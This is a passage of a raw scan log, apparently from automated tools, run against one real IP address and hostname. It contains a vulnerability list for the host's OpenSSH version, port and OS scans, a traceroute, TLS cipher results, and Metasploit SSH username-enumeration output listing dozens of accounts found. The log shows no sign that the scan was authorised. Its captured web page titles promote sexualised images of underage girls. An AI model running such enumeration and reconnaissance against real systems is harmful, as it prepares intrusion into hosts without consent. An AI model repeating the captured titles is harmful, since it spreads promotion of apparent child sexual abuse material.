17946| [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
17947| [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
17948| [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
17949| [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
17950| [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
17951| [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
17952| [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
17953| [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
17954| [100584] OpenSSH X Connections Session Hijacking Vulnerability
17955| [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
17956| [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
17957| [65987] SLES10: Security update for OpenSSH
17958| [65819] SLES10: Security update for OpenSSH
17959| [65514] SLES9: Security update for OpenSSH
17960| [65513] SLES9: Security update for OpenSSH
17961| [65334] SLES9: Security update for OpenSSH
17962| [65248] SLES9: Security update for OpenSSH
17963| [65218] SLES9: Security update for OpenSSH
17964| [65169] SLES9: Security update for openssh,openssh-askpass
17965| [65126] SLES9: Security update for OpenSSH
17966| [65019] SLES9: Security update for OpenSSH
17967| [65015] SLES9: Security update for OpenSSH
17968| [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
17969| [61639] Debian Security Advisory DSA 1638-1 (openssh)
17970| [61030] Debian Security Advisory DSA 1576-2 (openssh)
17971| [61029] Debian Security Advisory DSA 1576-1 (openssh)
17972| [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
17973| [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
17974| [60667] Slackware Advisory SSA:2008-095-01 openssh
17975| [59014] Slackware Advisory SSA:2007-255-01 openssh
17976| [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
17977| [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
17978| [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
17979| [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
17980| [57492] Slackware Advisory SSA:2006-272-02 openssh
17981| [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
17982| [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
17983| [57470] FreeBSD Ports: openssh
17984| [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
17985| [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
17986| [56294] Slackware Advisory SSA:2006-045-06 openssh
17987| [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
17988| [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
17989| [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
17990| [53788] Debian Security Advisory DSA 025-1 (openssh)
17991| [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
17992| [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
17993| [11343] OpenSSH Client Unauthorized Remote Forwarding
17994| [10954] OpenSSH AFS/Kerberos ticket/token passing
17995| [10883] OpenSSH Channel Code Off by 1
17996| [10823] OpenSSH UseLogin Environment Variables
17997|
17998| SecurityTracker - https://www.securitytracker.com:
17999| [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
18000| [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
18001| [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
18002| [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
18003| [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
18004| [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
18005| [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
18006| [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
18007| [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
18008| [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
18009| [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
18010| [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
18011| [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
18012| [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
18013| [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
18014| [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
18015| [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
18016| [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
18017| [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
18018| [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
18019| [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
18020| [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
18021| [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
18022| [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
18023| [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
18024| [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
18025| [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
18026| [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
18027| [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
18028| [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
18029| [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
18030| [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
18031| [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
18032| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
18033| [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
18034| [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
18035| [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
18036| [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
18037|
18038| OSVDB - http://www.osvdb.org:
18039| [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
18040| [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
18041| [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
18042| [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
18043| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
18044| [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
18045| [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
18046| [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
18047| [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
18048| [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
18049| [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
18050| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
18051| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
18052| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
18053| [56921] OpenSSH Unspecified Remote Compromise
18054| [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
18055| [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
18056| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
18057| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
18058| [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
18059| [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
18060| [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
18061| [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
18062| [43745] OpenSSH X11 Forwarding Local Session Hijacking
18063| [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
18064| [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
18065| [37315] pam_usb OpenSSH Authentication Unspecified Issue
18066| [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
18067| [34601] OPIE w/ OpenSSH Account Enumeration
18068| [34600] OpenSSH S/KEY Authentication Account Enumeration
18069| [32721] OpenSSH Username Password Complexity Account Enumeration
18070| [30232] OpenSSH Privilege Separation Monitor Weakness
18071| [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
18072| [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
18073| [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
18074| [29152] OpenSSH Identical Block Packet DoS
18075| [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
18076| [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
18077| [22692] OpenSSH scp Command Line Filename Processing Command Injection
18078| [20216] OpenSSH with KerberosV Remote Authentication Bypass
18079| [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
18080| [19141] OpenSSH GSSAPIAuthentication Credential Escalation
18081| [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
18082| [16567] OpenSSH Privilege Separation LoginGraceTime DoS
18083| [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
18084| [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
18085| [9550] OpenSSH scp Traversal Arbitrary File Overwrite
18086| [6601] OpenSSH *realloc() Unspecified Memory Errors
18087| [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
18088| [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
18089| [6072] OpenSSH PAM Conversation Function Stack Modification
18090| [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
18091| [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
18092| [5408] OpenSSH echo simulation Information Disclosure
18093| [5113] OpenSSH NIS YP Netgroups Authentication Bypass
18094| [4536] OpenSSH Portable AIX linker Privilege Escalation
18095| [3938] OpenSSL and OpenSSH /dev/random Check Failure
18096| [3456] OpenSSH buffer_append_space() Heap Corruption
18097| [2557] OpenSSH Multiple Buffer Management Multiple Overflows
18098| [2140] OpenSSH w/ PAM Username Validity Timing Attack
18099| [2112] OpenSSH Reverse DNS Lookup Bypass
18100| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
18101| [1853] OpenSSH Symbolic Link 'cookies' File Removal
18102| [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
18103| [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
18104| [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
18105| [688] OpenSSH UseLogin Environment Variable Local Command Execution
18106| [642] OpenSSH Multiple Key Type ACL Bypass
18107| [504] OpenSSH SSHv2 Public Key Authentication Bypass
18108| [341] OpenSSH UseLogin Local Privilege Escalation
18109|_
18110Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
18111Device type: general purpose|broadband router|WAP|webcam
18112Running (JUST GUESSING): Linux 2.6.X|3.X|2.4.X (95%), Asus embedded (94%), AXIS embedded (94%)
18113OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/h:asus:rt-ac66u cpe:/h:asus:rt-n10 cpe:/h:axis:211_network_camera cpe:/o:linux:linux_kernel:2.6.20 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:3.8
18114Aggressive OS guesses: Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.9 (95%), Linux 3.0 - 3.1 (94%), Asus RT-AC66U router (Linux 2.6) (94%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (94%), Linux 2.6.18 (94%), Asus RT-N16 WAP (Linux 2.6) (94%), Asus RT-N66U WAP (Linux 2.6) (94%), Tomato 1.28 (Linux 2.6.22) (94%), AXIS 211A Network Camera (Linux 2.6.20) (94%)
18115No exact OS matches for host (test conditions non-ideal).
18116Network Distance: 14 hops
18117Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
18118
18119TRACEROUTE (using port 22/tcp)
18120HOP RTT ADDRESS
181211 85.53 ms 10.246.204.1
181222 57.80 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
181233 60.21 ms irb-0.agg1.qc1.ca.m247.com (37.120.128.168)
181244 36.72 ms te-1-5-2-0.bb1.fra2.de.m247.com (82.102.29.44)
181255 38.16 ms te0-0-0-3.rcr21.ymq02.atlas.cogentco.com (38.104.155.233)
181266 57.89 ms be2089.ccr21.ymq01.atlas.cogentco.com (154.54.45.113)
181277 120.89 ms be3043.ccr22.lpl01.atlas.cogentco.com (154.54.44.165)
181288 120.91 ms be2182.ccr41.ams03.atlas.cogentco.com (154.54.77.245)
181299 120.92 ms be3433.rcr21.ams06.atlas.cogentco.com (154.54.58.202)
1813010 138.70 ms worldstream.demarc.cogentco.com (149.11.39.42)
1813111 138.65 ms 109.236.95.183
1813212 138.69 ms 190.2.158.153
1813313 138.74 ms 185.106.120.66
1813414 103.54 ms latina.petite.guru (185.82.200.52)
18135######################################################################################################################################
18136USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
18137RHOSTS => 185.82.200.52
18138RHOST => 185.82.200.52
18139[*] 185.82.200.52:22 - SSH - Using malformed packet technique
18140[*] 185.82.200.52:22 - SSH - Starting scan
18141[+] 185.82.200.52:22 - SSH - User 'admin' found
18142[+] 185.82.200.52:22 - SSH - User 'administrator' found
18143[+] 185.82.200.52:22 - SSH - User 'anonymous' found
18144[+] 185.82.200.52:22 - SSH - User 'backup' found
18145[+] 185.82.200.52:22 - SSH - User 'bee' found
18146[+] 185.82.200.52:22 - SSH - User 'ftp' found
18147[+] 185.82.200.52:22 - SSH - User 'guest' found
18148[+] 185.82.200.52:22 - SSH - User 'GUEST' found
18149[+] 185.82.200.52:22 - SSH - User 'info' found
18150[+] 185.82.200.52:22 - SSH - User 'mail' found
18151[+] 185.82.200.52:22 - SSH - User 'mailadmin' found
18152[+] 185.82.200.52:22 - SSH - User 'msfadmin' found
18153[+] 185.82.200.52:22 - SSH - User 'mysql' found
18154[+] 185.82.200.52:22 - SSH - User 'nobody' found
18155[+] 185.82.200.52:22 - SSH - User 'oracle' found
18156[+] 185.82.200.52:22 - SSH - User 'owaspbwa' found
18157[+] 185.82.200.52:22 - SSH - User 'postfix' found
18158[+] 185.82.200.52:22 - SSH - User 'postgres' found
18159[+] 185.82.200.52:22 - SSH - User 'private' found
18160[+] 185.82.200.52:22 - SSH - User 'proftpd' found
18161[+] 185.82.200.52:22 - SSH - User 'public' found
18162[+] 185.82.200.52:22 - SSH - User 'root' found
18163[+] 185.82.200.52:22 - SSH - User 'superadmin' found
18164[+] 185.82.200.52:22 - SSH - User 'support' found
18165[+] 185.82.200.52:22 - SSH - User 'sys' found
18166[+] 185.82.200.52:22 - SSH - User 'system' found
18167[+] 185.82.200.52:22 - SSH - User 'systemadmin' found
18168[+] 185.82.200.52:22 - SSH - User 'systemadministrator' found
18169[+] 185.82.200.52:22 - SSH - User 'test' found
18170[+] 185.82.200.52:22 - SSH - User 'tomcat' found
18171[+] 185.82.200.52:22 - SSH - User 'user' found
18172[+] 185.82.200.52:22 - SSH - User 'webmaster' found
18173[+] 185.82.200.52:22 - SSH - User 'www-data' found
18174[+] 185.82.200.52:22 - SSH - User 'Fortimanager_Access' found
18175[*] Scanned 1 of 1 hosts (100% complete)
18176[*] Auxiliary module execution completed
18177#######################################################################################################################################
18178Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-05 23:54 EDT
18179NSE: Loaded 164 scripts for scanning.
18180NSE: Script Pre-scanning.
18181Initiating NSE at 23:54
18182Completed NSE at 23:54, 0.00s elapsed
18183Initiating NSE at 23:54
18184Completed NSE at 23:54, 0.00s elapsed
18185Initiating Parallel DNS resolution of 1 host. at 23:54
18186Completed Parallel DNS resolution of 1 host. at 23:54, 0.02s elapsed
18187Initiating SYN Stealth Scan at 23:54
18188Scanning latina.petite.guru (185.82.200.52) [1 port]
18189Discovered open port 80/tcp on 185.82.200.52
18190Completed SYN Stealth Scan at 23:54, 0.16s elapsed (1 total ports)
18191Initiating Service scan at 23:54
18192Scanning 1 service on latina.petite.guru (185.82.200.52)
18193Completed Service scan at 23:54, 6.24s elapsed (1 service on 1 host)
18194Initiating OS detection (try #1) against latina.petite.guru (185.82.200.52)
18195Retrying OS detection (try #2) against latina.petite.guru (185.82.200.52)
18196Initiating Traceroute at 23:54
18197Completed Traceroute at 23:54, 0.16s elapsed
18198Initiating Parallel DNS resolution of 14 hosts. at 23:54
18199Completed Parallel DNS resolution of 14 hosts. at 23:54, 0.21s elapsed
18200NSE: Script scanning 185.82.200.52.
18201Initiating NSE at 23:54
18202####################################################################################################################################
18203http://185.82.200.52 [200 OK] Apache[2.4.10], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[185.82.200.52], Script[JavaScript], Title[MET-ART FREE TEEN GALLERIES BARELY LEGAL EROTIC PHOTO NUDE NYMPHETS]
18204#####################################################################################################################################
18205
18206wig - WebApp Information Gatherer
18207
18208
18209Scanning http://185.82.200.52...
18210________________________ SITE INFO _________________________
18211IP Title
18212185.82.200.52 MET-ART FREE TEEN GALLERIES BARELY LEGAL E
18213
18214_________________________ VERSION __________________________
18215Name Versions Type
18216Apache 2.4.10 Platform
18217Debian 8.0 | 8.0 (pre-release) OS
18218
18219____________________________________________________________
18220Time: 29.4 sec Urls: 825 Fingerprints: 40401
18221######################################################################################################################################
18222HTTP/1.1 200 OK
18223Date: Sun, 06 Oct 2019 03:54:57 GMT
18224Server: Apache/2.4.10 (Debian)
18225Last-Modified: Fri, 30 Mar 2018 13:05:08 GMT
18226ETag: "331e-568a0e3b68900"
18227Accept-Ranges: bytes
18228Content-Length: 13086
18229Vary: Accept-Encoding
18230Content-Type: text/html
18231
18232HTTP/1.1 200 OK
18233Date: Sun, 06 Oct 2019 03:54:57 GMT
18234Server: Apache/2.4.10 (Debian)
18235Last-Modified: Fri, 30 Mar 2018 13:05:08 GMT
18236ETag: "331e-568a0e3b68900"
18237Accept-Ranges: bytes
18238Content-Length: 13086
18239Vary: Accept-Encoding
18240Content-Type: text/html
18241
18242Allow: GET,HEAD,POST,OPTIONS
18243######################################################################################################################################
18244Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-05 23:55 EDT
18245NSE: Loaded 164 scripts for scanning.
18246NSE: Script Pre-scanning.
18247Initiating NSE at 23:55
18248Completed NSE at 23:55, 0.00s elapsed
18249Initiating NSE at 23:55
18250Completed NSE at 23:55, 0.00s elapsed
18251Initiating Parallel DNS resolution of 1 host. at 23:55
18252Completed Parallel DNS resolution of 1 host. at 23:55, 0.02s elapsed
18253Initiating SYN Stealth Scan at 23:55
18254Scanning latina.petite.guru (185.82.200.52) [1 port]
18255Discovered open port 443/tcp on 185.82.200.52
18256Completed SYN Stealth Scan at 23:55, 0.14s elapsed (1 total ports)
18257Initiating Service scan at 23:55
18258Scanning 1 service on latina.petite.guru (185.82.200.52)
18259Completed Service scan at 23:55, 12.74s elapsed (1 service on 1 host)
18260Initiating OS detection (try #1) against latina.petite.guru (185.82.200.52)
18261Retrying OS detection (try #2) against latina.petite.guru (185.82.200.52)
18262Initiating Traceroute at 23:55
18263Completed Traceroute at 23:55, 0.16s elapsed
18264Initiating Parallel DNS resolution of 14 hosts. at 23:55
18265Completed Parallel DNS resolution of 14 hosts. at 23:55, 0.42s elapsed
18266NSE: Script scanning 185.82.200.52.
18267Initiating NSE at 23:55
18268######################################################################################################################################
18269https://185.82.200.52 [200 OK] Apache[2.4.10], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[185.82.200.52], Script[JavaScript], Title[Books, videos, photos, fiction and non-fiction of and about young girls under 16 preteen models], X-UA-Compatible[IE=edge]
18270#####################################################################################################################################
18271Version: 1.11.13-static
18272OpenSSL 1.0.2-chacha (1.0.2g-dev)
18273
18274Connected to 185.82.200.52
18275
18276Testing SSL server 185.82.200.52 on port 443 using SNI name 185.82.200.52
18277
18278 TLS Fallback SCSV:
18279Server supports TLS Fallback SCSV
18280
18281 TLS renegotiation:
18282Secure session renegotiation supported
18283
18284 TLS Compression:
18285Compression disabled
18286
18287 Heartbleed:
18288TLS 1.2 not vulnerable to heartbleed
18289TLS 1.1 not vulnerable to heartbleed
18290TLS 1.0 not vulnerable to heartbleed
18291
18292 Supported Server Cipher(s):
18293Preferred TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
18294Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
18295Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
18296Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
18297Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
18298Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
18299Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
18300Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
18301Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
18302Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
18303Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
18304Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
18305Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
18306Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
18307Accepted TLSv1.2 256 bits CAMELLIA256-SHA
18308Accepted TLSv1.2 256 bits AES256-SHA
18309Accepted TLSv1.2 128 bits CAMELLIA128-SHA
18310Accepted TLSv1.2 128 bits AES128-SHA
18311Preferred TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
18312Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
18313Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
18314Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
18315Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
18316Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
18317Accepted TLSv1.1 256 bits CAMELLIA256-SHA
18318Accepted TLSv1.1 256 bits AES256-SHA
18319Accepted TLSv1.1 128 bits CAMELLIA128-SHA
18320Accepted TLSv1.1 128 bits AES128-SHA
18321Preferred TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
18322Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
18323Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
18324Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
18325Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
18326Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
18327Accepted TLSv1.0 256 bits CAMELLIA256-SHA
18328Accepted TLSv1.0 256 bits AES256-SHA
18329Accepted TLSv1.0 128 bits CAMELLIA128-SHA
18330Accepted TLSv1.0 128 bits AES128-SHA
18331
18332 SSL Certificate:
18333Signature Algorithm: sha256WithRSAEncryption
18334RSA Key Strength: 2048
18335
18336Subject: ygmt.info
18337Altnames: DNS:ygmt.info, DNS:www.ygmt.info
18338Issuer: COMODO RSA Domain Validation Secure Server CA
18339
18340Not valid before: Feb 14 00:00:00 2017 GMT
18341Not valid after: Feb 14 23:59:59 2018 GMT
18342#######################################################################################################################################
18343Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-05 23:59 EDT
18344NSE: Loaded 47 scripts for scanning.
18345NSE: Script Pre-scanning.
18346Initiating NSE at 23:59
18347Completed NSE at 23:59, 0.00s elapsed
18348Initiating NSE at 23:59
18349Completed NSE at 23:59, 0.00s elapsed
18350Initiating Ping Scan at 23:59
18351Scanning 185.82.200.52 [4 ports]
18352Completed Ping Scan at 23:59, 0.13s elapsed (1 total hosts)
18353Initiating Parallel DNS resolution of 1 host. at 23:59
18354Completed Parallel DNS resolution of 1 host. at 23:59, 0.02s elapsed
18355Initiating SYN Stealth Scan at 23:59
18356Scanning latina.petite.guru (185.82.200.52) [65535 ports]
18357Discovered open port 80/tcp on 185.82.200.52
18358Discovered open port 443/tcp on 185.82.200.52
18359Discovered open port 22/tcp on 185.82.200.52
18360Discovered open port 10000/tcp on 185.82.200.52
18361SYN Stealth Scan Timing: About 11.90% done; ETC: 00:03 (0:03:50 remaining)
18362SYN Stealth Scan Timing: About 17.78% done; ETC: 00:04 (0:04:42 remaining)
18363SYN Stealth Scan Timing: About 23.07% done; ETC: 00:05 (0:05:03 remaining)
18364SYN Stealth Scan Timing: About 31.86% done; ETC: 00:05 (0:04:19 remaining)
18365SYN Stealth Scan Timing: About 44.64% done; ETC: 00:06 (0:03:59 remaining)
18366SYN Stealth Scan Timing: About 53.26% done; ETC: 00:06 (0:03:34 remaining)
18367SYN Stealth Scan Timing: About 59.24% done; ETC: 00:07 (0:03:11 remaining)
18368SYN Stealth Scan Timing: About 65.75% done; ETC: 00:07 (0:02:45 remaining)
18369SYN Stealth Scan Timing: About 71.75% done; ETC: 00:07 (0:02:16 remaining)
18370SYN Stealth Scan Timing: About 77.37% done; ETC: 00:07 (0:01:50 remaining)
18371SYN Stealth Scan Timing: About 82.85% done; ETC: 00:07 (0:01:25 remaining)
18372SYN Stealth Scan Timing: About 88.49% done; ETC: 00:07 (0:00:57 remaining)
18373Completed SYN Stealth Scan at 00:07, 512.54s elapsed (65535 total ports)
18374Initiating Service scan at 00:07
18375Scanning 4 services on latina.petite.guru (185.82.200.52)
18376Completed Service scan at 00:07, 12.90s elapsed (4 services on 1 host)
18377Initiating OS detection (try #1) against latina.petite.guru (185.82.200.52)
18378Retrying OS detection (try #2) against latina.petite.guru (185.82.200.52)
18379Initiating Traceroute at 00:08
18380Completed Traceroute at 00:08, 0.15s elapsed
18381Initiating Parallel DNS resolution of 14 hosts. at 00:08
18382Completed Parallel DNS resolution of 14 hosts. at 00:08, 0.18s elapsed
18383NSE: Script scanning 185.82.200.52.
18384Initiating NSE at 00:08
18385Completed NSE at 00:08, 40.32s elapsed
18386Initiating NSE at 00:08
18387Completed NSE at 00:08, 1.22s elapsed
18388Nmap scan report for latina.petite.guru (185.82.200.52)
18389Host is up (0.12s latency).
18390Not shown: 65531 closed ports
18391PORT STATE SERVICE VERSION
1839222/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
18393| vulscan: VulDB - https://vuldb.com:
18394| [76870] OpenSSH up to 6.9 auth2-chall.c kbdint_next_device privilege escalation
18395| [76326] OpenSSH 6.8 XSECURITY privilege escalation
18396| [12724] OpenSSH up to 6.6 Fingerprint Record Check sshconnect.c verify_host_key HostCertificate weak authentication
18397| [12683] OpenBSD OpenSSH up to 6.5 Configuration child_set_env Wildcard privilege escalation
18398| [12124] OpenSSH 6.4 J-PAKE Protocol schnorr.c hash_buffer denial of service
18399| [11124] OpenSSH 6.2/6.3 Post Authentication sshd process initialize mm_newkeys_from_blob privilege escalation
18400|
18401| MITRE CVE - https://cve.mitre.org:
18402| [CVE-2012-5975] The SSH USERAUTH CHANGE REQUEST feature in SSH Tectia Server 6.0.4 through 6.0.20, 6.1.0 through 6.1.12, 6.2.0 through 6.2.5, and 6.3.0 through 6.3.2 on UNIX and Linux, when old-style password authentication is enabled, allows remote attackers to bypass authentication via a crafted session involving entry of blank passwords, as demonstrated by a root login session from a modified OpenSSH client with an added input_userauth_passwd_changereq call in sshconnect2.c.
18403| [CVE-2012-5536] A certain Red Hat build of the pam_ssh_agent_auth module on Red Hat Enterprise Linux (RHEL) 6 and Fedora Rawhide calls the glibc error function instead of the error function in the OpenSSH codebase, which allows local users to obtain sensitive information from process memory or possibly gain privileges via crafted use of an application that relies on this module, as demonstrated by su and sudo.
